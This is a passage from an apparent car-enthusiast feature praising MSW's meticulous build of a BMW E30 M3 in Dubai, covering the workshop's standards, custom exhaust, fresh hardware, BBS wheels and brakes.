Now, as those days, weeks and months have whipped by, the team at MSW, lead by Jon Simmonds, have juggled the time gifted to them between customer projects and the UAE Racing season with time spent creating this masterpiece that you see in front of you.
Project cars don’t come easy, and that much is even more pertinent when you go to the fastidious levels of perfection that Jon continually strives for. OCD could be simple justification, or you could dig a bit deeper and realise that perfection is one of those attainable things that so many people just miss.
Now this ‘OCD’ activity is not just limited to Jon’s project cars. You only need to take a wander around his facility in Dubai to get a feel for the sort of guy he is. When you walk into any garage that could replicate a Doctor’s surgery, you know the workmanship will be pretty special. Robi, along with Rich and all those involved, have put that thought process into practice.
As was always the plan, this E30 M3 was going to be the ultimate build. One that reflected everything that Jon and MSW believe in, but also one that would act has the perfect rolling advert when it came to the businesses capabilities.
From the beginning to how the car sits now, no expense, time or effort has been spared. When we tell you about simple things such as the time spent to get the in-house custom exhaust just right, you’ll fully understand how special this car is.
As our eyes crawled over the car, we very quickly noticed that every single nut, bolt and washer has been replaced. Everything you look at, you’d be happy eating your dinner off it. We are not exaggerating here! There is a very simple and clean colour coding set-up going on throughout the car – details that continue to make you giddy.
Even the mind-numbingly sexy BBS wheels are just perfect. Not to mention the very cheeky braking system the car runs.
